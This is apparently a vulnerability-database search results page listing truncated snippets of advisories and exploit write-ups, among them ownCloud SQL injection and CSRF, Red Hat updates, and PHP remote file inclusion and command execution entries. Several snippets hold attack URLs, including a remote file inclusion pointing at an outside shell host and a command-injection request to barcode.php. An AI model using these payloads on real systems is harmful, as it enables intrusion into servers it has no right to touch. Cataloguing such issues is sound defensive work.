224 matches found
contacts: SQL Injection - ownCloud
ownCloud before 5.0.1 does not neutralize special elements that are passed to the SQL query in addressbookprovider.php which therefore allows an authenticated attacker to execute arbitrary SQL commands. Affected Software ownCloud Server 5.0.1 CVE-2013-1893 Action Taken It is recommended that all...
CVE-2013-1413
COMPASS SECURITY ADVISORY http://www.csnc.ch/ CVE ID : CVE-2013-1413 CSNC ID: CSNC-2013-003 Product: i-doit Vendor: synetics Gesellschaft fьr Systemintegration mbH Subject: Cross-site Scripting - XSS Risk: High Effect: Remotely exploitable Author: Stephan Rickauer [email protected] Date:...
Critical: Red Hat Security Advisory: rubygem-activesupport security update
An updated rubygem-activesupport package that fixes one security issue is now available for Red Hat OpenShift Enterprise 1.0. The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System CVSS base score, which gives a detailed...
SCADA DNP3 direct operate no ack function code
...
SCADA DNP3 freeze no ack function code
...
Critical: Red Hat Security Advisory: firefox security update
Updated firefox packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5 and 6. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System CVSS base scores, which give detailed severity rating...
CSRF in appconfig.php - ownCloud
Cross-site request forgery CSRF vulnerability in core/ajax/appconfig.php in ownCloud before 4.0.7 allows remote attackers to hijack the authentication of administrators for requests that edit the app configurations. Affected Software ownCloud Server 4.0.7 CVE-2012-4391 Action Taken It is...
EasySiteEdit the remote file containing the defect and repair-vulnerability warning-the black bar safety net
Exploit Title: EasySiteEdit remote file include Author:koskesh jakesh Download address: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip Tested on: linux ------------------------------- vul:sublink.php line 2 0: include$REQUEST'langval'; ------------------------------- Test:...
PHP-Barcode 0.3pl1 - Remote Code Execution
PHP-Barcode 0.3pl1 Remote Code Execution The input passed to the code parameter is not sanitized and is used on a popen function. This allows remote command execution and also allows to see environment vars: Windows http://www.site.com/php-barcode/barcode.php?code=%TMP% Linux...
Moderate: Red Hat Security Advisory: postfix security update
Updated postfix packages that fix one security issue are now available for Red Hat Enterprise Linux 4, 5, and 6. The Red Hat Security Response Team has rated this update as having moderate security impact. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity...
AT-TFTP DoS
Crash if no acknowledgment is recevied after file is retrieved...
RHEL 5 : perl (RHSA-2010:0458)
Updated perl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System CVSS base scores, which give detailed severity ratings, are...
PT-2010-2042 · Microsoft · Windows Server 2008 +2
Name of the Vulnerable Software and Affected Versions: Microsoft Windows Vista versions Gold, SP1, and SP2 Microsoft Windows Server 2008 versions Gold and SP2 Description: A denial of service issue exists due to an error in TCP/IP processing when handling specially crafted TCP packets with a...
OSSIM v2.1.5 Remote Command Execution
Exploit for unknown platform in category web applications ===================================== OSSIM v2.1.5 Remote Command Execution ===================================== Advisory Name: Remote Command Execution in OSSIM Vulnerability Class: Remote Command Execution Release Date: 12-16-2009...
ClanLite 2.x - SQL Injection / Cross-Site Scripting
CANAKKALE GECiLMEZ yildirimordulari.org z0rlu.ownspace.org ClanLite V2 SQL inj. & XSS dork: Créé par Narfight, ClanLite V2.2006.05.20 © 2000-2005 dork: Themed By Ray © 2003, 2004 iOptional readme script / Fichier : Copyright : C 2004 ClanLite V2 Email : [email protected] This program is fr...
PT-2008-3425 · Digium +1 · Appliance Developer Kit +4
Name of the Vulnerable Software and Affected Versions: Asterisk Open Source versions 1.0.x through 1.2.27 and versions 1.4.x through 1.4.18 Asterisk Business Edition versions A.x.x through B.2.5.1 and versions C.x.x through C.1.8.0 AsteriskNOW versions prior to 1.0.3 Appliance Developer Kit...
joomlapuarcade-sql.txt
Joomla Component PU Arcade Remote SQL Injection Exploit AUTHOR : HouSSamix of H-T TeaM We are HouSSamix ToXiC350 CoNaN HOME : http://no-hack.net Script : PU Arcade Joomla Component Tested in version 2.0.3 & 2.1.3 Beta Download : http://www.pragmaticutopia.com/ DorKs : PU Arcade by...
trawler-1.8.1.txt
trawler = 1.8.1 Remote File Inclusion Download Source : http://harald-kampen.de/trawler1.8.1.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg @irc.dal.net exploit; http://localhost/msdazupdata/redaktion/artikel/up/index.php?pathred2=http://shell...
security flaw
The ippushpendingframes function in Linux 2.4.x and 2.6.x before 2.6.16 increments the IP ID field when sending a RST after receiving unsolicited TCP SYN-ACK packets, which allows remote attackers to conduct an Idle Scan nmap -sI attack, which bypasses intended protections against such attacks...
txtForum: Script Injection Vulnerability
=========================================================== txtForum: Script Injection Vulnerability =========================================================== Technical University of Vienna Security Advisory TUVSA-0603-004, March 9, 2006 =========================================================...